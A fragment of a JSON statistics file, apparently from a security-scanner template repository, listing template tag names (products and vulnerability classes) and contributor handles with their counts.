ount":23},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"router","count":22},{"name":"aem","count":19},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"debug","count":17},{"name":"weblogic","count":15},{"name":"php","count":15},{"name":"cve2011","count":15},{"name":"devops","count":15},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"struts","count":14},{"name":"wp-theme","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"deserialization","count":13},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"zoho","count":13},{"name":"dns","count":13},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"xxe","count":11},{"name":"magento","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"intrusive","count":10},{"name":"dell","count":10},{"name":"ibm","count":9},{"name":"vmware","count":9},{"name":"ftp","count":9},{"name":"gitlab","count":9},{"name":"kubernetes","count":9},{"name":"microsoft","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"airflow","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"rails","count":8},{"name":"cve2008","count":8},{"name":"cnvd","count":8},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"camera","count":7},{"name":"solr","count":6},{"name":"prometheus","count":6},{"name":"citrix","count":6},{"name":"lucee","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":6},{"name":"phpmyadmin","count":6},{"name":"fileupload","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"drupal","count":6},{"name":"laravel","count":6},{"name":"thinkphp","count":5},{"name":"headless","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"dedecms","count":5},{"name":"symfony","count":5},{"name":"crlf","count":5},{"name":"circarlife","count":5},{"name":"printer","count":5},{"name":"wso2","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"jolokia","count":5},{"name":"fatpipe","count":4},{"name":"traversal","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"rfi","count":4},{"name":"symantec","count":4},{"name":"webserver","count":4},{"name":"strapi","count":4},{"name":"slack","count":4},{"name":"git","count":4},{"name":"zimbra","count":4},{"name":"buffalo","count":4},{"name":"samsung","count":4},{"name":"npm","count":4},{"name":"grafana","count":4},{"name":"microstrategy","count":4},{"name":"maps","count":4},{"name":"keycloak","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"resin","count":4},{"name":"vpn","count":4},{"name":"zabbix","count":4},{"name":"glpi","count":4},{"name":"amazon","count":4},{"name":"solarwinds","count":4},{"name":"asp","count":4},{"name":"moodle","count":4},{"name":"proxy","count":4},{"name":"magmi","count":4},{"name":"exchange","count":4},{"name":"log","count":3},{"name":"lansweeper","count":3},{"name":"hoteldruid","count":3},{"name":"ebs","count":3},{"name":"smtp","count":3},{"name":"cves","count":3},{"name":"openam","count":3},{"name":"lfr","count":3},{"name":"oa","count":3},{"name":"ofbiz","count":3},{"name":"search","count":3},{"name":"r-seenet","count":3},{"name":"jeesns","count":3},{"name":"vbulletin","count":3},{"name":"minio","count":3},{"name":"sonicwall","count":3},{"name":"nacos","count":3},{"name":"cloud","count":3},{"name":"jellyfin","count":3},{"name":"springcloud","count":3},{"name":"bitrix","count":3},{"name":"telerik","count":3},{"name":"injection","count":3},{"name":"github","count":3},{"name":"itop","count":3},{"name":"opensis","count":3},{"name":"zhiyuan","count":3},{"name":"kevinlab","count":3},{"name":"exposures","count":3},{"name":"kafka","count":3},{"name":"cve2007","count":3},{"name":"cacti","count":3},{"name":"node","count":3},{"name":"linkerd","count":3},{"name":"fanruan","count":3},{"name":"tikiwiki","count":3},{"name":"caucho","count":3},{"name":"httpd","count":3},{"name":"targa","count":3},{"name":"openssh","count":3},{"name":"kibana","count":3},{"name":"bigip","count":3},{"name":"fpd","count":3},{"name":"azure","count":3},{"name":"mail","count":3},{"name":"nexus","count":3},{"name":"terramaster","count":3},{"name":"mongodb","count":3},{"name":"backdoor","count":3},{"name":"nosqli","count":3},{"name":"ssh","count":3},{"name":"druid","count":3},{"name":"bypass","count":2},{"name":"service","count":2},{"name":"dolibarr","count":2},{"name":"maian","count":2},{"name":"axis","count":2},{"name":"smb","count":2},{"name":"vcenter","count":2},{"name":"prestashop","count":2},{"name":"shellshock","count":2},{"name":"redis","count":2},{"name":"favicon","count":2},{"name":"jetbrains","count":2},{"name":"cache","count":2},{"name":"aspose","count":2},{"name":"phpstorm","count":2},{"name":"hashicorp","count":2},{"name":"netsweeper","count":2},{"name":"jsf","count":2},{"name":"spark","count":2},{"name":"mailchimp","count":2},{"name":"kong","count":2},{"name":"leak","count":2},{"name":"wordfence","count":2},{"name":"dos","count":2},{"name":"ecoa","count":2},{"name":"globalprotect","count":2},{"name":"hjtcloud","count":2},{"name":"upload","count":2},{"name":"rstudio","count":2},{"name":"liferay","count":2},{"name":"showdoc","count":2},{"name":"chyrp","count":2},{"name":"netis","count":2},{"name":"glassfish","count":2},{"name":"text","count":2},{"name":"icewarp","count":2},{"name":"seeyon","count":2},{"name":"payara","count":2},{"name":"avantfax","count":2},{"name":"ilo","count":2},{"name":"trixbox","count":2},{"name":"commax","count":2},{"name":"akkadian","count":2},{"name":"linkedin","count":2},{"name":"s3","count":2},{"name":"saltstack","count":2},{"name":"xxljob","count":2},{"name":"tidb","count":2},{"name":"nextcloud","count":2},{"name":"ec2","count":2},{"name":"geowebserver","count":2},{"name":"paloalto","count":2},{"name":"embed","count":2},{"name":"wuzhicms","count":2},{"name":"chiyu","count":2},{"name":"natshell","count":2},{"name":"fortios","count":2},{"name":"axis2","count":2},{"name":"hasura","count":2},{"name":"guacamole","count":2},{"name":"horde","count":2},{"name":"mida","count":2},{"name":"waf","count":2},{"name":"harbor","count":2},{"name":"getsimple","count":2},{"name":"linux","count":2},{"name":"sharepoint","count":2},{"name":"bitly","count":2},{"name":"openvpn","count":2},{"name":"emerge","count":2},{"name":"ecology","count":2},{"name":"justwriting","count":2},{"name":"webcam","count":2},{"name":"idea","count":2},{"name":"db","count":2},{"name":"activemq","count":2},{"name":"openemr","count":2},{"name":"aruba","count":2},{"name":"nextjs","count":2},{"name":"pega","count":2},{"name":"akamai","count":2},{"name":"zeroshell","count":2},{"name":"backups","count":2},{"name":"mcafee","count":2},{"name":"yapi","count":2},{"name":"middleware","count":2},{"name":"chamilo","count":2},{"name":"flir","count":2},{"name":"huawei","count":2},{"name":"lotus","count":2},{"name":"sonarqube","count":2},{"name":"qcubed","count":2},{"name":"prtg","count":2},{"name":"heroku","count":2},{"name":"yii","count":2},{"name":"hpe","count":2},{"name":"enumeration","count":2},{"name":"fortinet","count":2},{"name":"plesk","count":2},{"name":"kentico","count":2},{"name":"rockmongo","count":2},{"name":"status","count":2},{"name":"nagios","count":2},{"name":"bruteforce","count":2},{"name":"storage","count":2},{"name":"couchdb","count":2},{"name":"totemomail","count":2},{"name":"hostheader-injection","count":2},{"name":"openfire","count":2},{"name":"qihang","count":2},{"name":"idrac","count":2},{"name":"oauth","count":2},{"name":"voipmonitor","count":2},{"name":"cve2005","count":2},{"name":"igs","count":2},{"name":"electron","count":2},{"name":"adminer","count":2},{"name":"grav","count":2},{"name":"bucket","count":2},{"name":"vrealize","count":2},{"name":"jboss","count":2},{"name":"jeedom","count":2},{"name":"sitecore","count":2},{"name":"rocketchat","count":2},{"name":"splunk","count":2},{"name":"phpcollab","count":2},{"name":"odoo","count":2},{"name":"aviatrix","count":2},{"name":"ucmdb","count":2},{"name":"places","count":2},{"name":"frp","count":2},{"name":"rancher","count":2},{"name":"strava","count":1},{"name":"tpshop","count":1},{"name":"mirai","count":1},{"name":"bash","count":1},{"name":"novnc","count":1},{"name":"gurock","count":1},{"name":"commscope","count":1},{"name":"spf","count":1},{"name":"shopizer","count":1},{"name":"zookeeper","count":1},{"name":"logontracer","count":1},{"name":"couchbase","count":1},{"name":"find","count":1},{"name":"messaging","count":1},{"name":"ricoh","count":1},{"name":"dotnetnuke","count":1},{"name":"acme","count":1},{"name":"wamp","count":1},{"name":"salesforce","count":1},{"name":"octobercms","count":1},{"name":"drone","count":1},{"name":"jabber","count":1},{"name":"eprints","count":1},{"name":"lotuscms","count":1},{"name":"metinfo","count":1},{"name":"tieline","count":1},{"name":"goahead","count":1},{"name":"empirecms","count":1},{"name":"qvisdvr","count":1},{"name":"perl","count":1},{"name":"zmanda","count":1},{"name":"swagger","count":1},{"name":"zcms","count":1},{"name":"gateone","count":1},{"name":"nimble","count":1},{"name":"mysql","count":1},{"name":"processmaker","count":1},{"name":"eyelock","count":1},{"name":"jmx","count":1},{"name":"photo","count":1},{"name":"ssl","count":1},{"name":"solarlog","count":1},{"name":"node-red-dashboard","count":1},{"name":"kafdrop","count":1},{"name":"skycaiji","count":1},{"name":"netlify","count":1},{"name":"ecom","count":1},{"name":"achecker","count":1},{"name":"camunda","count":1},{"name":"weiphp","count":1},{"name":"miscrsoft","count":1},{"name":"mobileiron","count":1},{"name":"varnish","count":1},{"name":"fcm","count":1},{"name":"influxdb","count":1},{"name":"plugin","count":1},{"name":"jsp","count":1},{"name":"actuator","count":1},{"name":"subrion","count":1},{"name":"grails","count":1},{"name":"tor","count":1},{"name":"acontent","count":1},{"name":"onelogin","count":1},{"name":"hadoop","count":1},{"name":"mapbox","count":1},{"name":"buildkite","count":1},{"name":"turbocrm","count":1},{"name":"sar2html","count":1},{"name":"zyxel","count":1},{"name":"huijietong","count":1},{"name":"cockpit","count":1},{"name":"biometrics","count":1},{"name":"lanproxy","count":1},{"name":"instagram","count":1},{"name":"dbt","count":1},{"name":"ssltls","count":1},{"name":"woocommerce","count":1},{"name":"raspap","count":1},{"name":"ilo4","count":1},{"name":"livezilla","count":1},{"name":"smi","count":1},{"name":"svnserve","count":1},{"name":"tamronos","count":1},{"name":"lutron","count":1},{"name":"circleci","count":1},{"name":"speed","count":1},{"name":"rhymix","count":1},{"name":"geutebruck","count":1},{"name":"ns","count":1},{"name":"tracer","count":1},{"name":"interlib","count":1},{"name":"cors","count":1},{"name":"avtech","count":1},{"name":"openerp","count":1},{"name":"wmt","count":1},{"name":"dotclear","count":1},{"name":"okta","count":1},{"name":"directions","count":1},{"name":"gilacms","count":1},{"name":"springframework","count":1},{"name":"realteo","count":1},{"name":"key","count":1},{"name":"magicflow","count":1},{"name":"werkzeug","count":1},{"name":"database","count":1},{"name":"k8s","count":1},{"name":"sidekiq","count":1},{"name":"catfishcms","count":1},{"name":"synnefo","count":1},{"name":"feifeicms","count":1},{"name":"plone","count":1},{"name":"addpac","count":1},{"name":"alertmanager","count":1},{"name":"oneblog","count":1},{"name":"mantisbt","count":1},{"name":"fortigates","count":1},{"name":"redhat","count":1},{"name":"szhe","count":1},{"name":"bedita","count":1},{"name":"frontpage","count":1},{"name":"saltapi","count":1},{"name":"timesheet","count":1},{"name":"facebook","count":1},{"name":"xiuno","count":1},{"name":"openrestry","count":1},{"name":"alerta","count":1},{"name":"vscode","count":1},{"name":"codemeter","count":1},{"name":"jeewms","count":1},{"name":"pgadmin","count":1},{"name":"geolocation","count":1},{"name":"discourse","count":1},{"name":"dbeaver","count":1},{"name":"phpinfo","count":1},{"name":"ioncube","count":1},{"name":"dvwa","count":1},{"name":"trilithic","count":1},{"name":"webmin","count":1},{"name":"pulsesecure","count":1},{"name":"websphere","count":1},{"name":"websvn","count":1},{"name":"api-manager","count":1},{"name":"ghost","count":1},{"name":"acexy","count":1},{"name":"hubspot","count":1},{"name":"elascticsearch","count":1},{"name":"cofax","count":1},{"name":"idemia","count":1},{"name":"darkstat","count":1},{"name":"karel","count":1},{"name":"netgenie","count":1},{"name":"yzmcms","count":1},{"name":"doh","count":1},{"name":"gridx","count":1},{"name":"phalcon","count":1},{"name":"axiom","count":1},{"name":"blackboard","count":1},{"name":"exacqvision","count":1},{"name":"pihole","count":1},{"name":"elevation","count":1},{"name":"manager","count":1},{"name":"pivotaltracker","count":1},{"name":"vidyo","count":1},{"name":"nsasg","count":1},{"name":"cloudron","count":1},{"name":"cocoon","count":1},{"name":"particle","count":1},{"name":"twitter-server","count":1},{"name":"hiawatha","count":1},{"name":"domxss","count":1},{"name":"eg","count":1},{"name":"ruby","count":1},{"name":"exponentcms","count":1},{"name":"fontawesome","count":1},{"name":"zms","count":1},{"name":"email","count":1},{"name":"portainer","count":1},{"name":"starttls","count":1},{"name":"glowroot","count":1},{"name":"rsyncd","count":1},{"name":"rmi","count":1},{"name":"gogs","count":1},{"name":"weather","count":1},{"name":"cscart","count":1},{"name":"servicedesk","count":1},{"name":"buttercms","count":1},{"name":"graylog","count":1},{"name":"csod","count":1},{"name":"iceflow","count":1},{"name":"xml","count":1},{"name":"dotnet","count":1},{"name":"opm","count":1},{"name":"netmask","count":1},{"name":"jaspersoft","count":1},{"name":"sonarcloud","count":1},{"name":"newrelic","count":1},{"name":"yealink","count":1},{"name":"sureline","count":1},{"name":"ulterius","count":1},{"name":"gunicorn","count":1},{"name":"fedora","count":1},{"name":"phpunit","count":1},{"name":"nuuo","count":1},{"name":"zarafa","count":1},{"name":"deviantart","count":1},{"name":"diris","count":1},{"name":"lokalise","count":1},{"name":"dropbox","count":1},{"name":"mantis","count":1},{"name":"expose","count":1},{"name":"owa","count":1},{"name":"tugboat","count":1},{"name":"bookstack","count":1},{"name":"ewebs","count":1},{"name":"lancom","count":1},{"name":"netdata","count":1},{"name":"matrix","count":1},{"name":"timezone","count":1},{"name":"parentlink","count":1},{"name":"elfinder","count":1},{"name":"smartblog","count":1},{"name":"netrc","count":1},{"name":"openweather","count":1},{"name":"alibaba","count":1},{"name":"tcexam","count":1},{"name":"spectracom","count":1},{"name":"k8","count":1},{"name":"tink","count":1},{"name":"phpwiki","count":1},{"name":"luftguitar","count":1},{"name":"blue-ocean","count":1},{"name":"trane","count":1},{"name":"thinkadmin","count":1},{"name":"mediumish","count":1},{"name":"powercreator","count":1},{"name":"htmli","count":1},{"name":"plc","count":1},{"name":"nc2","count":1},{"name":"square","count":1},{"name":"javafaces","count":1},{"name":"opensmtpd","count":1},{"name":"gstorage","count":1},{"name":"faraday","count":1},{"name":"wooyun","count":1},{"name":"autocomplete","count":1},{"name":"centos","count":1},{"name":"mrtg","count":1},{"name":"razor","count":1},{"name":"tinypng","count":1},{"name":"beanshell","count":1},{"name":"scs","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"selea","count":1},{"name":"youtube","count":1},{"name":"dvr","count":1},{"name":"stem","count":1},{"name":"kindeditor","count":1},{"name":"csrf","count":1},{"name":"opencast","count":1},{"name":"mod-proxy","count":1},{"name":"ruckus","count":1},{"name":"soar","count":1},{"name":"wing-ftp","count":1},{"name":"details","count":1},{"name":"fuelcms","count":1},{"name":"maxsite","count":1},{"name":"robomongo","count":1},{"name":"centreon","count":1},{"name":"wondercms","count":1},{"name":"shopware","count":1},{"name":"securityspy","count":1},{"name":"qsan","count":1},{"name":"etouch","count":1},{"name":"pmb","count":1},{"name":"keenetic","count":1},{"name":"minimouse","count":1},{"name":"cse","count":1},{"name":"xampp","count":1},{"name":"forcepoint","count":1},{"name":"appveyor","count":1},{"name":"cve2006","count":1},{"name":"nweb2fax","count":1},{"name":"tenda","count":1},{"name":"javamelody","count":1},{"name":"rabbitmq","count":1},{"name":"wp","count":1},{"name":"myvuehelp","count":1},{"name":"openx","count":1},{"name":"nordex","count":1},{"name":"emc","count":1},{"name":"rujjie","count":1},{"name":"krweb","count":1},{"name":"linksys","count":1},{"name":"playable","count":1},{"name":"ipstack","count":1},{"name":"cerebro","count":1},{"name":"auth","count":1},{"name":"sourcebans","count":1},{"name":"jumpcloud","count":1},{"name":"paypal","count":1},{"name":"qdpm","count":1},{"name":"mautic","count":1},{"name":"wix","count":1},{"name":"kubeflow","count":1},{"name":"gsoap","count":1},{"name":"sentry","count":1},{"name":"dreamweaver","count":1},{"name":"sophos","count":1},{"name":"moin","count":1},{"name":"yachtcontrol","count":1},{"name":"limit","count":1},{"name":" default-login","count":1},{"name":"cloudinary","count":1},{"name":"blind","count":1},{"name":"fiori","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"74cms","count":1},{"name":"arl","count":1},{"name":"vercel","count":1},{"name":"moinmoin","count":1},{"name":"viewpoint","count":1},{"name":"sceditor","count":1},{"name":"artica","count":1},{"name":"primetek","count":1},{"name":"wavemaker","count":1},{"name":"ganglia","count":1},{"name":"vnc","count":1},{"name":"h3c-imc","count":1},{"name":"distance","count":1},{"name":"loganalyzer","count":1},{"name":"omi","count":1},{"name":"ambari","count":1},{"name":"owasp","count":1},{"name":"concrete","count":1},{"name":"cyberoam","count":1},{"name":"nexusdb","count":1},{"name":"spip","count":1},{"name":"python","count":1},{"name":"fastcgi","count":1},{"name":"bing","count":1},{"name":"kerbynet","count":1},{"name":"webadmin","count":1},{"name":"pagerduty","count":1},{"name":"checkpoint","count":1},{"name":"circle","count":1},{"name":"upnp","count":1},{"name":"listserv","count":1},{"name":"geocode","count":1},{"name":"csrfguard","count":1},{"name":"aura","count":1},{"name":"taiga","count":1},{"name":"oscommerce","count":1},{"name":"servicenow","count":1},{"name":"graphite","count":1},{"name":"triconsole","count":1},{"name":"totaljs","count":1},{"name":"scimono","count":1},{"name":"wavlink","count":1},{"name":"zm","count":1},{"name":"rubedo","count":1},{"name":"gloo","count":1},{"name":"ueditor","count":1},{"name":"jenzabar","count":1},{"name":"vsphere","count":1},{"name":"oidc","count":1},{"name":"tongda","count":1},{"name":"cloudflare","count":1},{"name":"zenario","count":1},{"name":"vsftpd","count":1},{"name":"roads","count":1},{"name":"aspnuke","count":1},{"name":"sage","count":1},{"name":"spring","count":1},{"name":"plastic","count":1},{"name":"optimizely","count":1},{"name":"craftcms","count":1},{"name":"froxlor","count":1},{"name":"spidercontrol","count":1},{"name":"postmark","count":1},{"name":"package","count":1},{"name":"secmail","count":1},{"name":"simplecrm","count":1},{"name":"xvr","count":1},{"name":"dnssec","count":1},{"name":"wildfly","count":1},{"name":"xmlchart","count":1},{"name":"proftpd","count":1},{"name":"okiko","count":1},{"name":"klog","count":1},{"name":"adafruit","count":1},{"name":"pippoint","count":1},{"name":"memcached","count":1},{"name":"azkaban","count":1},{"name":"monitorr","count":1},{"name":"gotmls","count":1},{"name":"jenkin","count":1},{"name":"jnoj","count":1},{"name":"mongoshake","count":1},{"name":"sgp","count":1},{"name":"emby","count":1},{"name":"pcoip","count":1},{"name":"jitsi","count":1},{"name":"mara","count":1},{"name":"tinymce","count":1},{"name":"episerver","count":1},{"name":"bolt","count":1},{"name":"xunchi","count":1},{"name":"sprintful","count":1},{"name":"bazarr","count":1},{"name":"testrail","count":1},{"name":"sqlite","count":1},{"name":"lighttpd","count":1},{"name":"calendly","count":1},{"name":"accela","count":1},{"name":"seacms","count":1},{"name":"bigbluebutton","count":1},{"name":"shoppable","count":1},{"name":"mkdocs","count":1},{"name":"visualstudio","count":1},{"name":"sangfor","count":1},{"name":"ems","count":1},{"name":"solman","count":1},{"name":"tileserver","count":1},{"name":"iptime","count":1},{"name":"clickhouse","count":1},{"name":"anchorcms","count":1},{"name":"meraki","count":1},{"name":"postgres","count":1},{"name":"expn","count":1},{"name":"iterable","count":1},{"name":"chinaunicom","count":1},{"name":"timeclock","count":1},{"name":"landrayoa","count":1},{"name":"chevereto","count":1},{"name":"cves2001","count":1},{"name":"sterling","count":1},{"name":"travis","count":1},{"name":"streetview","count":1},{"name":"rdp","count":1},{"name":"opentsdb","count":1},{"name":"clockwatch","count":1},{"name":"ognl","count":1},{"name":"finereport","count":1},{"name":"fortilogger","count":1},{"name":"intercom","count":1},{"name":"weglot","count":1},{"name":"gitlist","count":1},{"name":"daybyday","count":1},{"name":"hortonworks","count":1},{"name":"cgi","count":1},{"name":"leanix","count":1},{"name":"opensns","count":1},{"name":"announcekit","count":1},{"name":"javascript","count":1},{"name":"maccmsv10","count":1},{"name":"adb","count":1},{"name":"terraform","count":1},{"name":"circontrorl","count":1},{"name":"xdcms","count":1},{"name":"duomicms","count":1},{"name":"eyou","count":1},{"name":"crm","count":1},{"name":"beanstalk","count":1},{"name":"panos","count":1},{"name":"resourcespace","count":1},{"name":"openstack","count":1},{"name":"panasonic","count":1},{"name":"route","count":1},{"name":"redmine","count":1},{"name":"nette","count":1},{"name":"digitalocean","count":1},{"name":"zte","count":1},{"name":"spotify","count":1},{"name":"nuxeo","count":1},{"name":"stripe","count":1},{"name":"default","count":1},{"name":"extractor","count":1},{"name":"natemail","count":1},{"name":"cherokee","count":1},{"name":"office365","count":1},{"name":"pendo","count":1},{"name":"gespage","count":1},{"name":"nearby","count":1},{"name":"flink","count":1},{"name":"dahua","count":1},{"name":"asana","count":1},{"name":"asus","count":1},{"name":"traefik","count":1},{"name":"cvnd","count":1},{"name":"octoprint","count":1},{"name":"shopxo","count":1},{"name":"sco","count":1},{"name":"phpfusion","count":1},{"name":"circontrol","count":1},{"name":"postmessage","count":1},{"name":"mdb","count":1},{"name":"webex","count":1},{"name":"placeos","count":1},{"name":"apiman","count":1},{"name":"setup","count":1},{"name":"tensorflow","count":1},{"name":"tensorboard","count":1},{"name":"elasticsearch","count":1},{"name":"mariadb","count":1},{"name":"socomec","count":1},{"name":"monitorix","count":1},{"name":"nedi","count":1},{"name":"visualtools","count":1},{"name":"jfrog","count":1},{"name":"wakatime","count":1},{"name":"esmtp","count":1},{"name":"apos","count":1},{"name":"woocomernce","count":1},{"name":"nomad","count":1},{"name":"redwood","count":1},{"name":"apigee","count":1},{"name":"webui","count":1},{"name":"metabase","count":1},{"name":"expressjs","count":1},{"name":"appweb","count":1},{"name":"sarg","count":1},{"name":"olivetti","count":1},{"name":"st","count":1},{"name":"shoretel","count":1},{"name":"landray","count":1},{"name":"mpsec","count":1},{"name":"loqate","count":1},{"name":"burp","count":1},{"name":"shiro","count":1},{"name":"discord","count":1},{"name":"uwsgi","count":1},{"name":"bingmaps","count":1},{"name":"geddy","count":1},{"name":"tectuus","count":1},{"name":"fastapi","count":1},{"name":"sendgrid","count":1},{"name":"avalanche","count":1},{"name":"gitea","count":1},{"name":"locations","count":1},{"name":"labtech","count":1},{"name":"sast","count":1},{"name":"wiki","count":1},{"name":"comodo","count":1},{"name":"optiLink","count":1},{"name":"dwsync","count":1},{"name":"glances","count":1},{"name":"smartsense","count":1},{"name":"imap","count":1},{"name":"panabit","count":1},{"name":"graphql","count":1},{"name":"whm","count":1},{"name":"lg-nas","count":1},{"name":"phpshowtime","count":1},{"name":"syslog","count":1},{"name":"basic-auth","count":1},{"name":"pacsone","count":1},{"name":"xmpp","count":1},{"name":"ntopng","count":1},{"name":"mailgun","count":1},{"name":"webftp","count":1},{"name":"hiboss","count":1},{"name":"tjws","count":1},{"name":"motorola","count":1},{"name":"nps","count":1},{"name":"pyramid","count":1},{"name":"argussurveillance","count":1},{"name":"cve202","count":1},{"name":"b2evolution","count":1},{"name":"embedthis","count":1},{"name":"etherpad","count":1},{"name":"fortigate","count":1},{"name":"bullwark","count":1},{"name":"clusterengine","count":1},{"name":"majordomo2","count":1},{"name":"kyan","count":1},{"name":"clockwork","count":1},{"name":"haproxy","count":1},{"name":"myucms","count":1},{"name":"sugarcrm","count":1},{"name":"erp-nc","count":1},{"name":"sql","count":1},{"name":"phpfastcache","count":1},{"name":"remkon","count":1},{"name":"contentkeeper","count":1},{"name":"floc","count":1},{"name":"skywalking","count":1},{"name":"codeigniter","count":1},{"name":"fortiweb","count":1},{"name":"adiscon","count":1},{"name":"wazuh","count":1},{"name":"viewlinc","count":1},{"name":"tika","count":1},{"name":"graph","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"calendarix","count":1},{"name":"webmodule-ee","count":1},{"name":"nifi","count":1},{"name":"tapestry","count":1},{"name":"zend","count":1},{"name":"zzzcms","count":1},{"name":"nerdgraph","count":1},{"name":"dom","count":1},{"name":"mongo","count":1},{"name":"jquery","count":1},{"name":"billquick","count":1},{"name":"flexbe","count":1},{"name":"cobub","count":1},{"name":"clink-office","count":1},{"name":"twitter","count":1},{"name":"wifisky","count":1},{"name":"dompdf","count":1},{"name":"place","count":1}],"authors":[{"name":"dhiyaneshdk","count":300},{"name":"daffainfo","count":290},{"name":"pikpikcu","count":281},{"name":"pdteam","count":202},{"name":"geeknik","count":166},{"name":"dwisiswant0","count":152},{"name":"gy741","count":83},{"name":"pussycat0x","count":76},{"name":"princechaddha","count":67},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":58},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"johnk3r","count":6},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"e_schultze_","count":4},{"name":"wisnupramoedya","count":4},{"name":"github.com/its0x08","count":4},{"name":"incogbyte","count":4},{"name":"tess","count":4},{"name":"nodauf","count":4},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"idealphase","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"sullo","count":3},{"name":"_generic_human_","count":3},{"name":"sushantkamble","count":3},{"name":"vsh00t","count":3},{"name":"shine","count":3},{"name":"me9187","count":3},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"dudez","count":3},{"name":"shifacyclewala","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"johnjhacking","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"impramodsargar","count":3},{"name":"dheerajmadhukar","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"kiblyn11","count":2},{"name":"bernardofsr","count":2},{"name":"davidmckennirey","count":2},{"name":"alifathi-h1","count":2},{"name":"0xelkomy","count":2},{"name":"foulenzer","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"ree4pwn","count":2},{"name":"bing0o","count":2},{"name":"swissky","count":2},{"name":"martincodes-de","count":2},{"name":"0xsapra","count":2},{"name":"random-robbie","count":2},{"name":"zomsop82","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"parth","count":2},{"name":"0xprial","count":2},{"name":"huowuzhao","count":2},{"name":"r3naissance","count":2},{"name":"lark-lab","count":2},{"name":"udit_thakkur","count":2},{"name":"sy3omda","count":2},{"name":"gevakun","count":2},{"name":"cocxanh","count":2},{"name":"0xsmiley","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"afaq","count":2},{"name":"mohammedsaneem","count":2},{"name":"whoever","count":2},{"name":"ehsahil","count":2},{"name":"convisoappsec","count":2},{"name":"hetroublemakr","count":2},{"name":"hahwul","count":2},{"name":"g4l1t0","count":2},{"name":"gal nagli","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"x1m_martijn","count":2},{"name":"r12w4n","count":2},{"name":"amsda","count":2},{"name":"dahse89","count":2},{"name":"bp0lr","count":2},{"name":"randomrobbie","count":2},{"name":"joeldeleep","count":2},{"name":"lotusdll","count":2},{"name":"socketz","count":2},{"name":"0xrudra","count":2},{"name":"nkxxkn","count":2},{"name":"0xcrypto","count":2},{"name":"bsysop","count":2},{"name":"kaizensecurity","count":1},{"name":"furkansenan","count":1},{"name":"nerrorsec","count":1},{"name":"sshell","count":1},{"name":"ajaysenr","count":1},{"name":"bad5ect0r","count":1},{"name":"raesene","count":1},{"name":"mah3sec_","count":1},{"name":"florianmaak","count":1},{"name":"taielab","count":1},{"name":"chron0x","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"sickwell","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"omarkurt","count":1},{"name":"clarkvoss","count":1},{"name":"makyotox","count":1},{"name":"apt-mirror","count":1},{"name":"elouhi","count":1},{"name":"wabafet","count":1},{"name":"b4uh0lz","count":1},{"name":"thevillagehacker","count":1},{"name":"fmunozs","count":1},{"name":"borna nematzadeh","count":1},{"name":"regala_","count":1},{"name":"evolutionsec","count":1},{"name":"sid ahmed malaoui @ realistic 